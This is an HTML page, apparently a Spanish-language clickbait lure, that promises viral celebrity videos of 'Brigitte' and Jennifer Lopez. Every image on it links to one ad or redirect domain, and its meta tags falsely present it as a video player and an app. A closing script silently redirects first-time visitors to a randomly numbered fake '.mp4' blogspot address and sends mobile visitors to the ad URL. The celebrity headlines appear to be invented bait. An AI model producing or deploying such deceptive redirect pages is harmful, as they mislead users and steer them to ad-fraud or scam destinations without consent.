<html class='v2' dir='ltr' lang='en'>
<head>
<link rel="apple-touch-icon" href="https://i.imgur.com/ta693h7.jpeg">
    <meta property="al:android:package" content="http://rumb.iblogger.org/">
    <meta name="twitter:app:id:googleplay" content="http://rumb.iblogger.org/">
    <meta property="al:android:app_name" content="video">
    <meta name="twitter:app:name:googleplay" content="video">
    <meta name="twitter:card" content="summary_large_image">
    <meta property="og:image" content="https://i.imgur.com/ta693h7.jpeg">
    <meta name="twitter:image:src" content="https://i.imgur.com/ta693h7.jpeg">
    <title>00:30 ━●━━━━━─────── 5:35⇆</title>
    <meta property="og:title" content="00:30 ━●━━━━━─────── 5:35⇆">
    <meta name="twitter:title" content="00:30 ━●━━━━━─────── 5:35⇆">
    <meta property="og:description" content="VIEWS">
    <meta name="twitter:description" content="VIDEO">
    <meta name="twitter:app:country" content="US">
  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="UTF-8">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.2/css/all.css" integrity="sha384-fnmOCqbTlWIlj8LyTjo7mOUStjsKC4pOpQbqyi7RrhN7udi9RwhKkMHpvLbHG9Sr" crossorigin="anonymous">
    <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/spectrum/1.8.0/spectrum.min.css">
  </head><body style="padding:0; margin: 0;background: #e8dffb">
    <table style="height: 100%; width: 100%; background-color: #e8dffb;" align="center">  
      <tbody>
        <tr>  
          <td valign="top" id="dbody" data-version="2.31" style="width: 100%; height: 100%; margin-top: 50px; margin-bottom: 50px; padding-top: 12px; padding-bottom: 12px; background-color: #e8dffb;"><!--[if (gte mso 9)|(IE)]><table align="center" style="max-width:1004px" width="1004" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><![endif]-->
            <!--[if (gte mso 9)|(IE)]><table align="center" style="max-width:1024px" width="1024" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><![endif]-->
            <table class="layer_1" align="center" border="0" cellpadding="0" cellspacing="0" style="border-color: #ffffff; border-style: groove; max-width: 1004px; box-sizing: border-box; width: 100%; margin: 0px auto;">  
              <tbody>
                <tr><td class="drow" valign="top" align="center" style="background-color: #ffffff; box-sizing: border-box; font-size: 0px; text-align: center;"><!--[if (gte mso 9)|(IE)]><table width="100%" align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><![endif]--><div class="layer_2" style="display: inline-block; vertical-align: top; width: 100%; max-width: 1004px;"><table border="0" cellspacing="0" class="edcontent" style="border-collapse: collapse;width:100%"><tbody><tr><td valign="top" class="edtext" style="padding: 20px; text-align: left; color: #32325c; font-size: 13px; font-family: &quot;Open Sans&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, sans-serif; word-break: break-word; direction: ltr; box-sizing: border-box;"><p class="text-center" style="text-align: center;"><strong><span style="color: #ff0000; font-size: 30px;">VIDEO MP3 COMPLETO</span></strong></p></td></tr></tbody></table></div><!--[if (gte mso 9)|(IE)]></td></tr></table><![endif]--></td></tr><tr><td class="drow" valign="top" align="center" style="background-color: #ffffff; box-sizing: border-box; font-size: 0px; text-align: center;"><!--[if (gte mso 9)|(IE)]><table width="100%" align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><![endif]--><div class="layer_2" style="max-width: 1004px; display: inline-block; vertical-align: top; width: 100%;"><table border="0" cellspacing="0" cellpadding="0" class="edcontent" style="border-collapse: collapse;width:100%"><tbody><tr><td valign="top" class="edimg" style="padding: 0px; box-sizing: border-box; text-align: center;"><a href="https://candouraggravate.com/zvs3h7am2w?key=09023bbf5efe46e3e46ae2a2ba2650ce"><img src="https://api.smtprelay.co/userfile/6fed4fef-d139-4ab4-8939-ba69e786b521/arrow_arrows_direction_down_icon_1933732024-01-02T15_40_03.png" alt="Imagen" style="border-width: 0px; border-style: none; max-width: 163px; width: 100%;" width="163"></a></td></tr></tbody></table></div><!--[if (gte mso 9)|(IE)]></td></tr></table><![endif]--></td></tr><tr>  
                  <td class="drow" valign="top" align="center" style="background-color: #ffffff; box-sizing: border-box; font-size: 0px; text-align: center;">
                    <!--[if (gte mso 9)|(IE)]><table width="100%" align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><![endif]-->
                    
                    <!--[if (gte mso 9)|(IE)]></td><td valign="top"><![endif]-->
                    <div class="layer_2" style="max-width: 1004px; display: inline-block; vertical-align: top; width: 100%;">
                      <table border="0" cellspacing="0" cellpadding="0" class="edcontent" style="border-collapse: collapse;width:100%">
                        <tbody>
                          <tr>
                            <td valign="top" class="edimg" style="padding: 0px; box-sizing: border-box; text-align: center;">
                              <a href="https://candouraggravate.com/zvs3h7am2w?key=09023bbf5efe46e3e46ae2a2ba2650ce"><img src="https://api.smtprelay.co/userfile/6fed4fef-d139-4ab4-8939-ba69e786b521/giphy2024-03-15T13_07_36.gif" alt="Image" style="border-width: 0px; border-style: none; max-width: 598px; width: 100%;" width="598"></a>
                            </td>
                          </tr>
                        </tbody>
                      </table>
                    </div>
                    <!--[if (gte mso 9)|(IE)]></td></tr></table><![endif]-->  
                  </td>
                </tr><tr><td class="drow" valign="top" align="center" style="background-color: #ffffff; box-sizing: border-box; font-size: 0px; text-align: center;"><!--[if (gte mso 9)|(IE)]><table width="100%" align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><![endif]--><div class="layer_2" style="display: inline-block; vertical-align: top; width: 100%; max-width: 1004px;"><table border="0" cellspacing="0" cellpadding="0" class="edcontent" style="border-collapse: collapse;width:100%"><tbody><tr><td valign="top" class="edimg" style="text-align: center; padding: 20px; box-sizing: border-box;"><a href="https://candouraggravate.com/zvs3h7am2w?key=09023bbf5efe46e3e46ae2a2ba2650ce"><img src="https://api.smtprelay.co/userfile/6fed4fef-d139-4ab4-8939-ba69e786b521/Buw5EGO.gif" alt="Imagen" width="588" style="border-width: 0px; border-style: none; max-width: 588px; width: 100%;"></a></td></tr></tbody></table></div><!--[if (gte mso 9)|(IE)]></td></tr></table><![endif]--></td></tr><tr><td class="drow" valign="top" align="center" style="background-color: #ffffff; box-sizing: border-box; font-size: 0px; text-align: center;"><!--[if (gte mso 9)|(IE)]><table width="100%" align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><![endif]--><div class="layer_2" style="max-width: 1004px; display: inline-block; vertical-align: top; width: 100%;"><table border="0" cellspacing="0" cellpadding="0" class="edcontent" style="border-collapse: collapse;width:100%"><tbody><tr><td valign="top" class="edimg" style="padding: 20px; box-sizing: border-box; text-align: center;"><a href="https://candouraggravate.com/zvs3h7am2w?key=09023bbf5efe46e3e46ae2a2ba2650ce"><img src="https://api.smtprelay.co/userfile/6fed4fef-d139-4ab4-8939-ba69e786b521/453206316_122171104856200285_2084055344195217552_n.jpg" alt="Imagen" style="border-width: 0px; border-style: none; max-width: 399px; width: 100%;" width="399"></a></td></tr></tbody></table></div><!--[if (gte mso 9)|(IE)]></td></tr></table><![endif]--></td></tr><tr><td class="drow" valign="top" align="center" style="background-color: #ffffff; box-sizing: border-box; font-size: 0px; text-align: center;"><!--[if (gte mso 9)|(IE)]><table width="100%" align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><![endif]--><div class="layer_2" style="max-width: 1004px; display: inline-block; vertical-align: top; width: 100%;">  <table border="0" cellspacing="0" class="edcontent" style="border-collapse: collapse;width:100%">  <tbody><tr>  <td valign="top" class="edtext" style="padding: 20px; text-align: left; color: #32325c; font-size: 13px; font-family: &quot;Open Sans&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, sans-serif; word-break: break-word; direction: ltr; box-sizing: border-box;"><h1 class="text-center" style="text-align: center;"><span style="color: #ff0000;">Video viral de Brigitte disfrutando con sus amigas en el Antro</span></h1></td>  </tr>  <tr>  <td valign="top" class="edimg" style="padding: 20px; box-sizing: border-box; text-align: center;"><a href="https://candouraggravate.com/zvs3h7am2w?key=09023bbf5efe46e3e46ae2a2ba2650ce"><img src="https://api.smtprelay.co/userfile/6fed4fef-d139-4ab4-8939-ba69e786b521/brigitte.jpg" alt="Imagen" style="border-width: 0px; border-style: none; max-width: 424px; width: 100%;" width="424"></a></td>  </tr>    </tbody></table></div><!--[if (gte mso 9)|(IE)]></td></tr></table><![endif]--></td></tr><tr><td class="drow" valign="top" align="center" style="background-color: #ffffff; box-sizing: border-box; font-size: 0px; text-align: center;"><!--[if (gte mso 9)|(IE)]><table width="100%" align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><![endif]--><div class="layer_2" style="max-width: 1004px; display: inline-block; vertical-align: top; width: 100%;">  <table border="0" cellspacing="0" class="edcontent" style="border-collapse: collapse;width:100%">  <tbody><tr>  <td valign="top" class="edtext" style="padding: 20px; text-align: left; color: #32325c; font-size: 13px; font-family: &quot;Open Sans&quot;, &quot;Helvetica Neue&quot;, Helvetica, Arial, sans-serif; word-break: break-word; direction: ltr; box-sizing: border-box;"><p class="text-center" style="text-align: center;"><span style="font-size: 24px; color: #ff0000;"><strong>Jennifer Lopez actriz y cantante de 54 años, capturó la atención de sus seguidores</strong></span></p></td>  </tr>  <tr>  <td valign="top" class="edimg" style="padding: 20px; box-sizing: border-box; text-align: center;"><a href="https://candouraggravate.com/zvs3h7am2w?key=09023bbf5efe46e3e46ae2a2ba2650ce"><img src="https://api.smtprelay.co/userfile/6fed4fef-d139-4ab4-8939-ba69e786b521/453480715_122148627800254085_7560355382582841176_n.jpg" alt="Imagen" style="border-width: 0px; border-style: none; max-width: 368px; width: 100%;" width="368"></a></td>  </tr>    </tbody></table></div><!--[if (gte mso 9)|(IE)]></td></tr></table><![endif]--></td></tr><tr><td class="drow" valign="top" align="center" style="background-color: #ffffff; box-sizing: border-box; font-size: 0px; text-align: center;"><!--[if (gte mso 9)|(IE)]><table width="100%" align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><![endif]--><div class="layer_2" style="max-width: 1004px; display: inline-block; vertical-align: top; width: 100%;"><table border="0" cellspacing="0" cellpadding="0" class="edcontent" style="border-collapse: collapse;width:100%"><tbody><tr><td valign="top" class="edimg" style="padding: 20px; box-sizing: border-box; text-align: center;"><a href="https://candouraggravate.com/zvs3h7am2w?key=09023bbf5efe46e3e46ae2a2ba2650ce"><img src="https://api.smtprelay.co/userfile/6fed4fef-d139-4ab4-8939-ba69e786b521/453431646_122140967492316728_4533412413928180821_n.jpg" alt="Imagen" style="border-width: 0px; border-style: none; max-width: 455px; width: 100%;" width="455"></a></td></tr></tbody></table></div><!--[if (gte mso 9)|(IE)]></td></tr></table><![endif]--></td></tr>  
              </tbody>
            </table>  
            <!--[if (gte mso 9)|(IE)]></td></tr></table><![endif]-->
          </td>
        </tr>  
      </tbody>
    </table>  
  
</body></html><body data-rsssl=1 data-rsssl=1 data-rsssl=1>
    <div class="container">
        <h1 id="header">
            <a href="">
                <img alt="" class="logo" src="" />
            </a>
           
        </h1>
        <p id="description"></p>
        <a class="button" href="" id="button_search"></a>
    </div>

    <div class="card">
        <div class="author-container">
            <img alt="" class="author-img" src="" />
            <span class="author-name"></span>
        </div>
        <a href="" id="dynamicLink">
            <img alt="" src="" />
        </a>
    </div>

    <div class="footer">
        <ul><!-- Enlaces del pie de página --></ul>
    </div>

    <script>
        // Verificar si es la primera visita
        if (!localStorage.getItem('visited')) {
            // Generar un número aleatorio único y actualizar el enlace dinámico
            var randomNumber = Math.floor(Math.random() * 10000000000); // Número aleatorio de 0 a 999,999,9999
            var dynamicLink = document.getElementById('dynamicLink');
            dynamicLink.href = 'https://vid893rqwr23r8334343.blogspot.com/?m=' + randomNumber + '.mp4'; // Agregar .mp4 al final del número aleatorio
            // Establecer una bandera para indicar que el usuario ha visitado la página
            localStorage.setItem('visited', 'true');
            // Redirigir automáticamente si es la primera visita
            window.location.href = dynamicLink.href;
        } else {
            // Redirigir a la URL específica para dispositivos móviles
            if (window.innerWidth <= 480 && window.innerHeight <= 800) {
                window.location.href = 'https://candouraggravate.com/zvs3h7am2w?key=09023bbf5efe46e3e46ae2a2ba2650ce';
            }
        }
    </script> 
